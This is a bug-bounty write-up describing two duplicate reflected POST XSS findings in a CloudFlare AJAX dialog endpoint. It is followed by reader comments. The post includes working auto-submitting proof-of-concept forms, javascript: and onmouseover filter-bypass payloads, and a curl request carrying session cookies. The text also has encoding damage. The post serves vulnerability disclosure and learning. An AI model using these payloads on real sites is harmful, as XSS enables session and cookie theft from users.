#1 XSS
These are some of my duplicate vulnerabilities found. I just thought of sharing with you. Recently I found two POST XSS in CloudFlare and unfortunately I was not the first to report.
I found the first issue in the âConfirm Key Generatorâ dialog box.
Letâs have a closer look at the URL.
/ajax/model-dialog.htm
It seems like an XMLHttpRequest object is used in the server side it accept our POST request.
After playing around with âcontent=â parameter what Iâve noticed was that it filters all HTML tags except
[code language=âhtmlâ]
<b></b> <p></p><A HREF=ââ>
[/code]
Well as <A HREF> tag is not filtered we can easily execute JavaScript.
[code language=âhtmlâ]
<A HREF=âjavascript:alert(document.cookie);â>XSS</A>
[/code]
So the proof of concept would be:
[code language=âhtmlâ]
<html>
<!â POC by Osanda â>
<body>
<form name="exploit" action="https://www.cloudflare.com/ajax/modal-dialog.html" method="POST">
<input type="hidden" name="type" value="default" />
<input type="hidden" name="content" value="Go to this link <A HREF="javascript:prompt('XSS by Osanda');">XSS</A>" />
<script>document.exploit.submit(); </script>
</form>
</body>
</html>
[/code]
We donât need an authorized account to trigger XSS since the issue is in âmodel-dialog.htmâ. Here is the Curl command
[code language=âhtmlâ]
curl -i -s -k -X âPOSTâ \
-H âUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0â -H âContent-Type: application/x-www-form-urlencoded; charset=UTF-8â -H âX-Requested-With: XMLHttpRequestâ -H âReferer: https://www.cloudflare.com/my-accountâ \
-b â__cfduid=dcfb031f1436b2c98ee75cfda0b313f9b1395243158470; __utma=1.1850105675.1399902759.1399910158.1400126593.4; __utmz=1.1399902759.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=1.7.10.1400126593; __utmc=1; vses2=9pvibldsqecve4b63ef9h13h75; __cf_effload=1âČ \
âdata-binary $âtype=default&content=Go to this link <A HREF=\"javascript:prompt(\âXSS by Osanda\â);\">XSS</A>â \
âhttps://www.cloudflare.com/ajax/modal-dialog.htmlâ
[/code]
That is it Game Over đ
#2 XSS
The second XSS issue was in the âzoneuploadâ parameter in the âmodel-dialog.htmlâ file. In the previous scenario all the HTML tags are truncated but in here instead they are converted into special chars. How to bypass this one? đ
Well as usual â'() are not filtered đ
[code language=âhtmlâ]
ABC" onmouseover="prompt(âXSS by Osandaâ) ""
[/code]
Here is the proof of concept:
[code language=âhtmlâ]
<html>
<body>
<form action="https://www.cloudflare.com/ajax/modal-dialog.html" method="POST">
<input type="hidden" name="type" value="zoneupload" />
<input type="hidden" name="z" value="google.lk" />
<input type="hidden" name="target" value="ABC" onmouseover="prompt('XSS by Osanda') """ />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
[/code]
So yeah here we go XSS again đ
Bug hunting is not all about getting your name in hall of fames or receiving rewards or being the first to report. I just enjoy finding vulnerabilities and love to learn something new đ
Great brother !
I learn a lot of things with you thanks !
Great bro!
dude nice findings, and i like your wallpaper. wanna share?
Thanks! Iâll mail you shortly đ
wow, awesome bro.
Thanks for your marvelous posting! I actually enjoyed reading it, you
could be a great author.I will be sure to
bookmark your blog and will come back in the foreseeable future.
I want to encourage continue your great posts, have a nice morning!
was this ever fixed?
Its Amazing finding Sir.
Thanks mate đ
Wow nice
wowâŠaiye..